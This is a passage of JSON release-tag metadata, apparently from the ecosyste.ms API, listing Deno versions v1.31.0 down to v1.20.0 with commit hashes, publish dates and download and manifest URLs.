nload_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.